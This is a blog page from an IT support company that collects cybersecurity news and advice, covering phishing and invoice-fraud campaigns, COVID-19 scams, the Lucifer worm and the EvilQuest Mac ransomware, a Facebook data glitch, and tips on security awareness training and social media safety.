Are You Having A Technology Emergency?

True North Networks Blog

True North Networks has been a national provider since 2002, providing IT support such as technical helpdesk support, computer support, and consulting to small and medium-sized businesses.

A "Secure DNS" Scam: an Upgrade that's a Downgrade


phishing campaign is targeting website owners with convincing, personalized emails that purport to come from WordPress, Naked Security reports. The emails claim that WordPress is upgrading the recipient’s domain to use DNSSEC (Domain Name System Security Extensions). The message has minimal spelling and grammatical errors, and it contains real explanations (copied from ICANN’s website) of what DNS and DNSSEC are. Naked Security notes that many website operators will most likely have heard of DNSSEC, and they probably know that it’s a good security measure.

“On the other hand, you’ve probably never set up DNSSEC or used it directly yourself, because it has typically been a feature used by service providers to help to keep their own DNS databases intact when they exchange data with other DNS servers,” Naked Security says. “In other words, activating DNSSEC for the server names that your hosting provider looks after for you certainly sounds like a good idea. So we can understand why some recipients of this scam might click through in order to learn more.”

The emails contain a link that’s tailored to each recipient. In Naked Security’s case, the link said, “Click here and activate DNSSEC to” If the recipient clicks the link, they’ll be taken to a phishing page that convincingly spoofs a WordPress login page. The page specifically says “Admin Area” to convince the user to enter their administrative credentials, which will be sent to the attackers.

While this scam was tailored to WordPress users (since Naked Security is hosted on WordPress), Naked Security found an image directory on the phishing site that contained the banner logos of 97 other hosting providers, including Akamai, HostGator, Linode, Magento, and Microsoft. The link in the email is customized so that users of different hosting providers will see the login page specific to their provider.

New-school security awareness training can enable your employees to be suspicious anytime they’re asked to enter their credentials.


Continue reading

Business Email Compromise Attacks Focused on Invoice Fraud Surge by 75%


As attacks on the C-Suite decline, new data shows that employees in finance department roles are critical to the success of shifts in attack campaign strategy.

There’s one thing we’ve learned to be true about cybercriminals that use phishing emails as their initial attack vector – it’s that they always align their target victim with the campaign. From selecting the victim, to the choice of crime to be committed, to the social engineering tactics, every last detail is planned out to maximize the success of the attack efforts.

According to email security provider, Abnormal Security, in their Quarterly BEC Report Q1 2020, those cybercriminal organizations engaged in business email compromise attacks have changed their tactics – in some cases drastic changes:

  • From individual to group targets – campaigns with more than 10 recipients were up 27%
  • From C-suite to finance staff – campaigns targeting execs declined by 37% while those targeting finance staffers increased 87%
  • From engagement attacks to invoice fraud – paycheck and engagement attacks declined by more than half while invoice fraud increased by 75%
  • COVID-19 remains popular – Throughout the course of Q1, coronavirus-themed attacks rose by an average of 173%

With the overarching takeaway being that all your finance employees are the target of invoice fraud, there’s something tangible to communicate to that segment of your staff to avoid becoming a victim. But because tactics will continue to change as organizations become wise to attacks and other areas of businesses lax their sense of security, it’s important to keep the entire organization vigilant by enrolling them in continual Security Awareness Training, which educates them on the need to be watchful for suspicious content and offers up pertinent examples as attack trends change.


Continue reading

How to protect yourself from COVID-19 scams and improve cyber hygiene


Earlier this month, the Canadian Centre for Cyber Security released an update to their list of ways that people in Canada can protect themselves from COVID-19 scams. In a statement made earlier today, Canada Labour Minister Filomena Tassi said that “Canadians are still being targeted by scams involving text messages and emails, which can lead to identity theft and financial loss; The Canadian Centre for Cyber Security has advice to help you improve your cyber hygiene.”

According to the Canadian Centre for Cyber Security, the five ways that people in Canada can protect themselves from COVID-19 scams are as follows:

1. Be on guard for scams

Don’t click on suspicious links. Also note that the government will never send you a text message about a payment or send you an e-transfer. (Visit the CRA website for ways to spot different scams.)

2. Secure your social media and email accounts

Review your privacy settings on social media and make sure your security questions to all your account logins are something only you would know the answer to.

3. Apply updates to your mobile devices, computers and applications

These updates are important and often contain “security patches.” Enable automatic updates if given the option to do so.

4. Store your data securely and know your back-up procedures

In addition to using an anti-virus or anti-malware program, it’s important to back up important information and files. You can use a cloud service to do that, but be sure to practise data recovery at least once so you know what to expect if you have to do it again.

5. Practice good password etiquette

Use passwords that are complex, and never share them. Don’t use the same passwords between different accounts, and use two-factor authentication when possible.

For the complete statement on cyber hygiene during COVID-19 from the Canadian Centre for Cyber Security, click here.


Continue reading

Half of all Remote Employees Aren’t the Slightest Bit Prepared for Cyberattacks


New data from IBM suggests that employees, their devices, training, and organizational policies are all lacking when it comes making sure remote workers don’t become a victim of cybercrime.

We’re well-past the shock of needing to setup remote operations with employees working from home. And enough time has passed that the world has seen how cybercriminals have changes their targets and tactics to take advantage of the unsuspecting remote worker.

So, surely, one would expect to see organizations taking steps to ensure the security of the employee, and the organization itself, right?

Well, according to IBM Security’s newly-released Work from Home Study, cyber readiness in the remote workplace is still a mess:

  • 53% of remote employees “have yet to be given any new security policies on how to securely work from home”
  • Of the over half of remote employees using their personal device for work, 61% say their employer hasn’t taken steps to help secure it
  • 66% haven’t been given any password management guidelines
  • 45% haven’t been given any new security training

The shift to working from home is not just about making employees operational; it’s also about extending at least the same security policies and governance to the remote worker, while shoring up security upon realizing the increased risk of them working from home.

With so many security issues to address – from insecure WiFi, to personal devices, to home distractions, to a lack of guidance, where should organizations pick up the pieces today?

Given so many variables of how a given employee may be connecting to organizational resources, the answer lies in the one constant – the employee themselves. By enrolling employees in Security Awareness Training, the organization props up the best possible defense against the ever-changing state of cyberattack. Employees can be taught to be mindful of corporate data, the use of phishing and social engineering, and how to spot suspicious email and web content.

Remote workers still have a lot of adjustment on their plate and it seems like every week, there’s something new to deal with. By providing a source of stability through training, organizations can immediately see an improvement in their remote security stance, providing time to address the other factors.


Continue reading

National Security Agency warns that VPNs could be vulnerable to cyberattacks


The National Security Agency issued a new cybersecurity advisory on Thursday, warning that virtual private networks, or VPNs, could be vulnerable to attacks if not properly secured. The agency's warning comes amid a surge in telework as organizations adapt to coronavirus-related office closures and other constraints.

A VPN allows users to establish private, encrypted connections to another network over the internet. They are used widely by corporations and other organizations to protect proprietary data from hackers while employees work remotely. 

A senior NSA official who briefed reporters Wednesday said the increase in remote work had attracted the attention of potentially malicious cyber actors.  

Continue reading

[Heads Up] A New Devilish Malware Worm Called Lucifer Is Targeting Your Windows Workstations


Palo Alto Networks’ Unit 42 Security experts have identified a malware worm called Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

This brand-new strain initially tries to infect PCs by bombarding them with a big list of known exploits, hoping to cash in on unpatched vulns. While patches for all these critical and high-severity bugs exist, the organizations infected by this new strain malware had not applied the patches.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” Palo Alto said on Wednesday in a blog post. “Applying the updates and patches to the affected software are strongly advised.”

The exploits Lucifer is using include Rejetto HTTP File Server (CVE-2014-6287), Oracle Weblogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), Apache Struts (CVE-2017-9791), Laravel framework  CVE-2019-9081), and Microsoft Windows (CVE-2017-0144CVE-2017-0145, and CVE-2017-8464).

After a successful exploit, the strain connects to its command-and-control (C2) server and is able to execute any commands on the fully pwned device. Some "features" allow the malware to drop an XMRig miner and launch cryptojacking attacks, as well as collecting interface info and sending the miner status to the C2. 

The malware is also capable of self-propagation with worm-like features.

The Threatpost site commented: "It scans for either open TCP ports (also known as port 1433) or open Remote Procedure Call (RPC) ports (also known as port 135). If either of these ports is open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42’s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.

In addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the EternalBlue, EternalRomance, and DoublePulsar exploits.

Once these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.

“While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,” stressed researchers."


Continue reading

Facebook Privacy Glitch Gave 5K Developers Access to ‘Expired’ Data


Facebook has fixed a privacy issue that gave developers access to user data long after the 90-day “expiration” date.

Facebook is facing yet another privacy faux pas in how its users’ data is collected and used by third-party apps. The social media giant said that it recently discovered that 5,000 developers received data from Facebook users — long after their access to that data should have expired.

In 2018, on the heels of the Cambridge Analytica privacy incident, Facebook debuted stricter controls over data collection by third-party app developers. As part of that, Facebook announced it would automatically expire an app’s ability to receive a user’s data if they hadn’t used the app in 90 days.

However, recently, “we discovered that in some instances apps continued to receive the data that people had previously authorized, even if it appeared they hadn’t used the app in the last 90 days,” said Konstantinos Papamiltiadis, vice president of Platform Partnerships with Facebook, in a Wednesday post.

For example, “this could happen if someone used a fitness app to invite their friends from their hometown to a workout, but we didn’t recognize that some of their friends had been inactive for many months,” he said.

Facebook estimates that 5,000 developers were able to continually receive information (such as language or gender) on “inactive” app users, in this manner. It has since fixed the issue.

The company said it hasn’t seen evidence that this issue resulted in sharing information that was inconsistent with the permissions people gave when they logged in using Facebook, however.

Facebook’s privacy troubles began in 2018 after its Cambridge Analytica privacy snafu. After that, the company said it suspended tens of thousands of apps as part of its ongoing investigation into how third-party apps on its platform collect, handle and utilize users’ personal data. And then in 2019, Facebook found that 100 third-party app developers improperly accessed the names and profile pictures of members in various Facebook groups.

“Facebook is a data-aggregation company first and foremost. Given this, it’s of no surprise that slip ups occasionally occur around the handling of the vast amount of raw and post-processed data they house,” Jonn Callahan, principal AppSec consultant at nVisium, told Threatpost. “This is especially true given their track record. It’s clear that proper handling of the collected data comes second to the monetization of the data.”

To bolster its privacy policies, earlier in June, Facebook said it had started to report its privacy practices to a newly formed, independent Privacy Committee. The creation of the independent committee was part of the company’s settlement a year ago with the Federal Trade Commission (FTC) over data-privacy violations, which came in addition to a $5 billion fine (which was derided as “chump change” by lawmakers and privacy analysts).

Facebook said on Wednesday it would attempt to further tighten its policies around third-party data collection by providing developers with clearer guidance around data usage and sharing.

“Today we’re also introducing new Platform Terms and Developer Policies to ensure businesses and developers clearly understand their responsibility to safeguard data and respect people’s privacy when using our platform,” Papamiltiadis said. “These new terms limit the information developers can share with third parties without explicit consent from people. They also strengthen data security requirements and clarify when developers must delete data.”

Brendan O’Connor, CEO and co-founder of AppOmni, said Facebook does deserve some kudos for its recent steps in attempting to control data collection by developers. “Raising awareness of unused applications and helping users make better data privacy decisions is a big step in the right direction, and Facebook deserves some credit for their approach,”  he told Threatpost.

Threatpost has reached out to Facebook for further comment on the privacy flaw, as well as its new privacy policies for developers.


Continue reading

How You Can Increase Employee Engagement with Security Awareness Training


One of the most common questions I get asked working for a security awareness training company is, how do I make employees more engaged with and care about the training? I get it. Who wants to take even more time doing “busy work” when you’ve got a real job to do?

As my co-worker Perry Carpenter says in his book, Transformation Security Awareness, “They may be aware and still not care.” Here’s how you make them care.

There are two keys: First, imparting the importance and second, incentives.

The Importance of Security Awareness Training

Part of the problem is that most users have no idea how big of a role security awareness training can play in their fight against social engineering and phishing as compared to other defenses. Users are told they have to do a “hundred different things” to fight computer crime, such as “Make sure your software is patched”, “Make sure to lock your desktop when you are away”, “Don’t click on unexpected file attachments”, and “Make sure your password is long and complex”. Users hear so many rules and recommendations that they can’t figure out which one is or isn’t as important as another. There is very little teaching of relevance in the computer security world. It’s as if we treated playing with Nerf darts the same as playing with real guns. Both can cause injury, but one is more likely to result in serious, long-lasting injury than another.

But if you share the facts, that nothing could be as important to the cybersecurity of an organization as fighting social engineering (and show them using data and pictures), it helps to provide relevance and focus. According to nearly every study done on computer security crime for over a decade, social engineering and phishing are responsible for more cybersecurity incidents than any other cause. Social engineering and phishing are responsible for 70% to 90% of security breaches. Unpatched software is responsible for 20% to 40% of malicious data breaches. Nothing else comes close. All other types of computer crime (e.g., password attacks, eavesdropping, misconfiguration, insider attacks, etc.) amount to just 1% to 10% of malicious data breaches. The figure below shows risk percentages of the top two risks as compared to all the others.

This means there is nothing else that matters as much to reduce cybersecurity risk as focusing on defeating social engineering and phishing. This also means that if an organization doesn’t effectively mitigate social engineering and phishing, nothing else matters.

I don’t want you to just trust me and what I say, although my co-worker, Javvad Malik’s white paper revealed that the top cause of cyber crime was social engineering and phishing in the 100 other threat intelligence reports he reviewed. Just ask yourself and ask your employees to ask, when they have been hacked by a malicious hacker or were infected by malware, how did it happen? Ninety-nine percent of the time, I bet you and they will say it was either social engineering or unpatched software. When employees learn that social engineering is the biggest cyber risk their organization faces, they usually understand why it’s important that they help in fighting it.


Incentivizing people to want to take training doesn’t hurt, especially if they first understand and care why they have to take it. Some people like to threaten employees, “Take this training or you are fired!” At KnowBe4, we believe in more carrot and less stick. That doesn’t mean you can’t have penalties for not taking training, but don’t just make it about negative reinforcement. Even if it is something they have to take, I’d rather see whether they took the training as part of a wider review process, such as an annual review. I’m completely open to people taking training as part of determining whether they get a good or a bad review; just don’t make it the sole deciding factor. I’d hate to see an otherwise perfect employee who has never been tricked by social engineering or phishing in real life get a bad review simply because they didn’t take training. But I’m OK with making the training mandatory and noting a negative indicator on their annual review if they don’t take it.

Note: I’ve also heard of bosses who fired people who failed one simulated phishing test. That’s definitely a bit harsh and I don’t recommend it. Policies like those incentivize people who fall for phishing and realize it, to cover it up instead of proactively reporting to IT so the risk can be addressed early and appropriately.

Other Ideas to Engage Employees

Here are some other ideas on how to get employees more engaged in security awareness training:

Offer Rewards

Offer nothing but a carrot. I know of organizations that offer cash bonuses, up to $1,000, for employees who not only take/pass security awareness training, but who also don’t fail any simulated phishing tests. This is essentially making it part of their annual review process, but not calling it out as solely a negative. This is a chance for someone to make more money, not to lose something promised. Some organizations offer quarterly gift cards to employees who take training and don’t fail simulated phishing tests. I’ve seen organizations pay for pizza parties, gifts, and even mini, nearby vacations.

If the latter idea sounds extravagant, I thought the same when a CEO told me he paid $1,000 to every employee at the end of the year for passing all simulated phishing tests. I told him I could not believe he gave so much money to each employee and how generous it was. He told me that if I believed social engineering and phishing were the top threat to most organizations (and I do), then it was some of the best money he’s spending each year. He said almost no employee clicks on any URL link without investigating it first. No one wants to lose their $1,000. He said in the five years, he’s been offering the money, they’ve been malware and ransomware free, and that isn’t true of any of his closest competitors. He said the $1000 per employee that he spends works better than any antivirus defense he’s paid for in his career.

He said if an organization doesn’t have an extra thousand to give each employee, just give every new employee hired $1,000 less in salary when they come on and offer what you would have given them anyway as part of the competition. He said you end up paying them what you would have paid them anyway, they think you are great for giving them a chance for an extra $1,000 bonus around Christmas time, and it will create a comprehensive culture of security awareness at your organization. I can’t argue with that.

Offer Interesting Training

Most employees have had enough boring, staid training. So, give them more exciting education. For example, at KnowBe4, our award-winning, Netflix-like, The Inside Man series is loved by almost every person who takes it. It’s not going to win an Oscar, but for computer security training, it’s pretty great. The Inside Man uses professional actors with professional production values and a mystery-driven narrative to show and teach computer security defenses. No one can believe that it is training. We have security administrators and employees asking when the next episodes will be out. When does that ever happen with training? Well, it does with The Inside Man.

Switch It Up

Make sure you switch up training content. Try different things. Different people learn differently. At KnowBe4, our extensive content spans across just about every type of learning style you can imagine – videos, documents, posters, quizzes, and even cartoons. Even if someone loves a particular style of learning, say The Inside Man, it can’t hurt to switch it up every now and then. Maybe switch to a cartoon or send around a security training poster, like KnowBe4’s Social Engineering Red Flags PDF as shown below and available for download here.

Don’t Underestimate the Power of a Certificate

It’s amazing what a printed certificate of achievement can do to brighten someone’s outlook. Many organizations recognize employees who go a quarter or year without failing a simulated phishing test with a certificate suitable for hanging. It’s a small, nearly cost-free, action that will result in a tremendous amount of goodwill and feeling of accomplishment in many employees. It’s not the paper they love, it’s the recognition of their accomplishments by an organization that shows it cares.

Offer Free Training for Families

Nothing makes people care more than if you care about them and their families. All KnowBe4 customers get content that is meant to be shared with their families. When mom or dad is sharing tips on how not to be socially engineered or phished with their children, the more likely they are to be better trained for work.

Simulated Phishing

Lastly, you just send simulated phishing emails to your employees and co-workers. Simulated phishing emails used to be seen as sort of taboo. Today, nearly every organization does it and it’s rare to have an organization that doesn’t do it. Simulated phishing is a part of the education process. It reinforces the educational lessons learned and helps employees and IT gauge the effectiveness of their security awareness program. Don’t let criminal phishers be the only time your employees are phished. Plus, it creates a gamification of the training; especially if it isn’t associated with purely negative consequences. If you make it a game, you will get a certain percentage of your employees genuinely engaged who otherwise would not have been.


Continue reading

Social Media Cybersecurity Safety Tips


Have your family, friends and community follow these tips to safely enjoy social media.

Privacy and security settings exist for a reason: Learn about and use the privacy and security settings on social networks. They are there to help you control who sees what you post and manage your online experience in a positive way.

Once posted, always posted: Protect your reputation on social networks. What you post online stays online. Think twice before posting pictures you wouldn’t want your parents or future employers to see. Recent research found that 70 percent of job recruiters rejected candidates based on information they found online.

Your online reputation can be a good thing: Recent research also found that recruiters respond to a strong, positive personal brand online. So show your smarts, thoughtfulness and mastery of the environment.

Keep personal info personal: Be cautious about how much personal information you provide on social networking sites. The more information you post, the easier it may be for a hacker or someone else to use that information to steal your identity, access your data or commit other crimes such as stalking.

Know and manage your friends: Social networks can be used for a variety of purposes. Some of the fun is creating a large pool of friends from many aspects of your life. That doesn’t mean all friends are created equal. Use tools to manage the information you share with friends in different groups or even have multiple online pages. If you’re trying to create a public persona as a blogger or expert, create an open profile or a “fan” page that encourages broad participation and limits personal information. Use your personal profile to keep your real friends (the ones you know and trust) up to date with your daily life.

Be honest if you’re uncomfortable: If a friend posts something about you that makes you uncomfortable or seems inappropriate, let them know. Likewise, stay open minded if a friend approaches you because something you’ve posted makes him or her uncomfortable. People have different tolerances for how much the world knows about them respect those differences.

Know what action to take: If someone is harassing or threatening you, remove them from your friends list, block them and report them to the site administrator.

Keep security software current: Having the latest security software, web browser and operating system is the best defense against viruses, malware and other online threats.

Own your online presence: When applicable, set the privacy and security settings on websites to your comfort level for information sharing. It’s OK to limit how and with whom you share information.

Make your passphrase a sentence: A strong passphrase is a sentence that is at least 12 characters long. Focus on positive sentences or phrases that you like to think about and are easy to remember (for example, “I love country music.”). On many sites, you can even use spaces!

Unique account, unique passphrase: Having separate passphrases for every account helps to thwart cybercriminals. At a minimum, separate your work and personal accounts and make sure that your critical accounts have the strongest passphrases.

When in doubt, throw it out: Links in email, tweets, posts and online advertising are often how cybercriminals try to steal your personal information. Even if you know the source, if something looks suspicious, delete it.

Post only about others as you have them post about you: The Golden Rule applies online as well.


Continue reading

EvilQuest Mac Ransomware Has Keylogger, Crypto Wallet-Stealing Abilities


A rare, new Mac ransomware has been discovered spreading via pirated software packages.

A rare new ransomware strain targeting macOS users has been discovered, called EvilQuest. Researchers say the ransomware is being distributed via various versions of pirated software.

EvilQuest, first discovered by security researcher Dinesh Devadoss, goes beyond the normal encryption capabilities for run-of-the-mill ransomware, including the ability to deploy a keylogger (for monitoring what’s typed into devices) and the capability to steal cryptocurrency wallets on the victims’ systems.

EvilQuest samples have been found in various versions of pirated software, which are being shared on BitTorrent file-sharing sites. While this method of infection is relatively unsophisticated, it is common for other macOS malware variants – including OSX.Shlayer – “thus indicating it is (at least at some level) successful,” according to Patrick Wardle, security researcher with Jamf, in a Monday analysis.

While Devadoss found the ransomware purporting to be a Google Software Update package, Wardle inspected a ransomware sample that was being distributed via a pirated version of “Mixed In Key 8,” which is software that helps DJs mix their songs.

Another sample was analyzed Tuesday by Thomas Reed, director of Mac and mobile with Malwarebytes, in a malicious, pirated version of Little Snitch. Little Snitch is a legitimate, host-based application firewall for macOS. The malicious installer was found available for download on a Russian forum, dedicated to sharing torrent links.

“The legitimate Little Snitch installer is attractively and professionally packaged, with a well-made custom installer that is properly code signed,” Reed said. “However, this installer was a simple Apple installer package with a generic icon. Worse, the installer package was pointlessly distributed inside a disk image file.”

Once a victim downloads these various malicious apps, they install an executable file, named “patch”, into the “/Users/Shared/” directory. After the installation process is completed, a post-install script is then downloaded, and used to load and trigger the executable. The ransomware then begins encrypting victims’ files by invoking the “eip_encrypt” function. Once file encryption is complete, it creates a text file (READ_ME_NOW) with the ransom instructions (the ransom for the samples found was $50).

Interestingly, to ensure the victims see the ransom note, the ransomware displays a text-to-speech prompt, which reads the ransom note aloud to the victim via the macOS built-in “voice” capabilities.

Reed found that “the malware… appeared to encrypt a number of settings files and other data files, such as the keychain files. This resulted in an error message when logging in, post-encryption.”

The ransomware also has capabilities for  in-memory code execution, anti-analysis and persistence, researchers found. As part of its anti-analysis measures, EvilQuest includes the functions “is_debugging” and “is_virtual_mchn.” These features attempt to thwart debugging efforts, as well as sniff out if its being run inside a virtual machine (both indications that a malware researcher may be attempting to analyze it).

The malware was meanwhile spotted making calls for CGEventTapCreate, which is a system routine that allows for monitoring of events like keystrokes, and is commonly used by malware for keylogging. Researchers found tasks from the ransomware’s command and control (C2) server prompting it to start a keylogger.

The ransomware also has the capabilities to detect several cryptocurrency wallet files, with commands to hunt out the following specific ones: “wallet.pdf”, “wallet.png”, “key.png” and “*.p12.”

Wardle said that the malware can meanwhile open a reverse shell to the C2 server. “Armed with these capabilities, the attacker can main full control over an infected host,” he warned.

EvilQuest joins a small list of ransomware families in the wild specifically targeting Mac users, including KeRanger and MacRansom. However, “there are still a number of open questions that will be answered through further analysis,” Reed said. “For example, what kind of encryption does this malware use? Is it secure, or will it be easy to crack (as in the case of decrypting files encrypted by the FindZip ransomware)? Will it be reversible, or is the encryption key never communicated back to the criminals behind it (also like FindZip)?”



Continue reading

COVID-19 Related Phishing Scams Target Passport Details


The Coronavirus phishing scams have only gotten more aggressive and targeted now than ever before, InfoSecurity Magazine reports. Now researchers at Griffin Law are tracking self-employed people being targeted with established COVID-19 related phishing emails.

According to Griffin Law, the scam begins with a text message purporting to be from HMRC informing the recipient they are due a tax refund which can be applied for online via an official looking site that uses HMRC branding and is entitled “Coronavirus (COVID-19) guidance and support.”

The bogus site then asks for several pieces of the user’s sensitive information before also requesting their passport number as ‘verification’ – a new aspect of the scam previously discovered by Griffin Law.

Chris Ross, SVP, Barracuda Networks, warned that cyber-criminals will continue to exploit any situation to harvest financial data from individuals and see the national emergency as the perfect opportunity to fool vulnerable victims into handing over personal information.

“Security awareness is key within the workforce, and it’s vital that all employees are trained about how these schemes operate as well as how SMS can be exploited as part of a wider phishing scheme.”

New school security awareness training can teach your users how to spot the warning signs for these types of phishing tactics.


Continue reading

Enterprises Experience Nearly Five Times as Many Mobile Phishing Attacks as Last Year


With every organization looking at protecting their corporate devices, the bad guys are increasingly setting their focus on one of the softest targets: the mobile device.

The use of a mobile device for both work and personal use is ubiquitous in today’s society. The ability to switch from responding to a business email to finding flowers for your significant other on the same device has made the mobile device a necessity in most people’s lives. This constant use of a trusted device is the perfect way for cybercriminals to find ways to scam both individuals and businesses.

According to mobile security vendor Lookout’s The State of Mobile Phishing report, mobile attacks continue to be on the rise.

The percentage of businesses that have encountered a mobile phishing attack year-over-year in the 1st quarter has jumped 475% over 2019! North American businesses have seen the greatest amount of mobile phishing with nearly one-quarter (24.71%) of organizations experiencing mobile phishing attacks. Top industries targeted include healthcare, professional services, financial services, and manufacturing.

In the wake of COVID, we’ve learned that 36% of employees access work applications from personal devices – which includes mobile devices. This means with the massive growth in mobile phishing attacks, organizations are materially more at risk than a year ago.

To address this risk, organizations need to empower users to embrace a security mindset using Security Awareness Training. By educating user on how phishing attacks work, the devices and methods used, and the impact of a successful attack, users can act as part of the organization’s security strategy to thwart attacks before they gain a foothold.



Continue reading

Slack Phishing


People need to be able to use their instincts in order to spot new phishing techniques, according to Ashley Graves, a Cloud Security Researcher at AT&T Alien Labs. On the CyberWire’s Research Saturday podcast, Graves described a phishing technique that abuses webhooks in Slack to fool users into granting an attacker access to their Slack data.

A webhook is a feature that allows third-party apps to send messages to a specific Slack channel via a unique URL. Anyone can send a message to the Slack channel if they know this URL, so it’s important that the URL be kept secret. If an attacker discovers a leaked webhook URL, they can craft a phishing message and send it directly into a Slack workspace to trick a user into installing a malicious app. This app can then exfiltrate data from the targeted workspace.

Graves emphasized that this attack doesn’t have any visible warning signs, since the communication comes directly from Slack through a legitimate service.

“The only indication that exists would be the person's gut feeling that it doesn't seem right, that this app should not be requesting this level of data,” she said.

Graves said part of the solution is improved awareness around what attackers can do with certain information.

“So, I think some people legitimately don't understand how much access an attacker can gain when credentials are leaked, and even more so when a webhook secret is leaked,” Graves explained. “On the other side of it is understanding what you're giving third parties access to. So, knowing to read those OAuth scopes, understanding how the application that you're using might use that access. Like, it wouldn't make sense – to me, at least – for a webhook to need access to my documents. So, that's something that they have to look over and have some sort of understanding around whether it's some self-learning, whether it's included in security awareness training or something like that.”

Graves noted that anyone can be fooled by social engineering, so companies need to ensure that users know when they should be cautious and ask for assistance before taking an action.

“But again, we've seen in similar attacks in the past that users can be easily tricked and that it's not stupidity,” she said. “It's not even ignorance. It's just that this is very new technology to a lot of people, and the prompts are not always clear, and there is a lot of small text about how they work. So I think that companies need to, I suppose, make as much effort as possible to help people understand the impact of their actions.”

Attackers will never stop coming up with new ways to dupe people into granting them access. New-school security awareness training can give your employees a healthy sense of suspicion to enable them to stop social engineering attacks.


Continue reading

Don't Fall Victim To These Common Social Networking Scams


When we consider phishing scams, we tend to think about email, but many cybercriminals target popular social media channels to hook their prey. The central goal is still to persuade someone to click a link, reveal logins and passwords or share other sensitive details. Victims may unwittingly trigger the download of malware, installing keyloggers that record keystrokes and Trojans that send them to cybercriminals. Sometimes victims will enter login details onto fake websites or answer queries that are presented as legitimate requests or fun activities, like quizzes.

Social networking is all about interacting with people, and familiarity with social media platforms can cause us to let our guard down. It's easy to emulate official services like Twitter or Facebook, and hacked accounts can be leveraged to cause all sorts of mischief.

In this article, we're going to delve into some common scams on four of the most popular social media platforms.

Typical Facebook Phishing Scams

As the largest social media platform on earth, Facebook has become an all too popular hunting ground for cybercriminals. Despite Facebook's efforts to combat spam and scams, it remains a hotbed for phishing attacks. There are many kinds of phishing scenarios at play on Facebook.

Cybercriminals will often send emails that purport to come from Facebook and closely imitate the look of genuine emails. These phishing emails will typically include an alarming message stating that your password has been reset and you must click on a link or open an attachment to sort things out or risk losing access to your account.

Invariably, the link or attachment triggers malware. But this kind of thing is a typical email phishing ploy that's counting on your familiarity and trust with Facebook.

Some of the sneakier phishing attacks will use the platform itself. You may be befriended by fake accounts that cybercriminals have set up specifically to harvest personal details.

Hacked accounts are frequently used to post malicious links that may direct people to fake login pages. If the victim enters their email address and password, then the scammer has access to their account and personal details, using it to scam all their contacts in a similar manner.

You're much more likely to click a link when it appears to have been posted by a trusted friend or family member. Some scammers use hacked accounts to appeal to family and friends for money transfers. If the cybercriminal is smart, they will wait until someone is traveling, then send an instant message through Facebook posing as the person, explaining that they've run into trouble, and appealing to family or friends for help. Usually, a link will be offered to make the cash transfer.

Even those apparently innocuous quizzes that people do for a bit of fun, such as "What Star Wars character are you?" may be data grabs from unscrupulous third-party developers. This can lead to the sale of your personal details and endless spam. If these shenanigans didn't work, they wouldn't exist.

Anatomy Of A Twitter Phish

Starting out with a phishing email to collect Twitter login details, cybercriminals can then use any accounts they've gained access to and send direct messages to the contacts of those people to trick them into clicking links. Because Twitter has a character limit on tweets, it's also easy for cybercriminals to hide dodgy links using services like to shorten the URL and hide the real address.

Another common scam on Twitter is to offer thousands of followers, sometimes even targeted demographics that businesses may covet. If you're persuaded to make a payment, you can end up at risk of identity theft. There's also a good chance, even if you do gain extra followers, that they'll be associated with fake accounts, which can lead to a Twitter ban.

Phishing On YouTube

Many scams on YouTube focus on the pursuit of more views, promising traffic increases or more subscribers if you hand over your YouTube account details and credit card number. This can lead to identity theft, your account being used to scam others or malware infection — sometimes all three.

Some scams exploit major events, such as natural disasters or terrorist attacks, to persuade you to click on a link to view a video that has supposedly been removed from YouTube for copyright reasons. This might trigger a pop-up window that insists you need to install a toolbar to watch the video or a survey that must be completed. In either case, you'll end up with malware on your system, or your personal details being used to hack your accounts or steal your identity.

Phishing Lures On LinkedIn

Even LinkedIn, the social networking of choice for businesspeople, isn't immune from phishing scams. Cybercriminals will frequently create false profiles, even posing as co-workers, to connect with you and gain access to your personal data. Sometimes the scammers will join group discussions and post malicious links that purport to be lucrative job offers or fake online application forms that can be used to harvest personal data.

These are just four popular platform examples of clicking gone wrong. If you ever posted on Craigslist, then you've probably been targeted with an offer to send you money, usually more than your asking price, and often without the person ever actually seeing the item for sale, in exchange for some personal details like your home address. If it sounds too good to be true, it always is.

In every case, you can protect yourself by maintaining a natural cynicism plus cautious distrust. Guard your personal information, be wary about who you connect with and, if in doubt, trust your instincts.

Our next in the series will look at even more tips for how to protect yourself from social media scams.


Continue reading

Phishing Attacks Significantly Increase in Singapore During COVID-19 Pandemic


The number of phishing attacks in Singapore to give up personal information has almost tripled in the last year and doubled during the COVID-19 pandemic, according to the Cybersecurity Agency of Singapore (CSA).

The CSA said that there were over 47,500 cases of phishing attacks last year, compared to 16,100 cases back in 2018.

This mirrors global trends as the number of phishing attacks around the world spiked in 2019, the highest since 2016.

The Minister-in-Charge of Cybersecurity S. Iswaran said phishing attacks continue to rise according to hackers, with 1,500 dubious links sent during March to May, twice as many compared with the preceding three months.

According to CSA's fourth annual report titled Singapore Cyber Landscape 2019, the Immigration and Checkpoints Authority, Ministry of Manpower and Singapore Police Force were government agencies that criminals most commonly pretended to be in those phishing e-mails and messages sent.

Unsuspecting users who click on the dubious links in the messages would be tricked into revealing personal information such as passwords or contact details. Mr Iswaran said that Singapore is a lucrative target for hackers. New-school security awareness training can ensure your users know how to spot the common red flags for a phishing email. 


Continue reading

Ransomware is now your biggest online security nightmare. And it's about to get worse


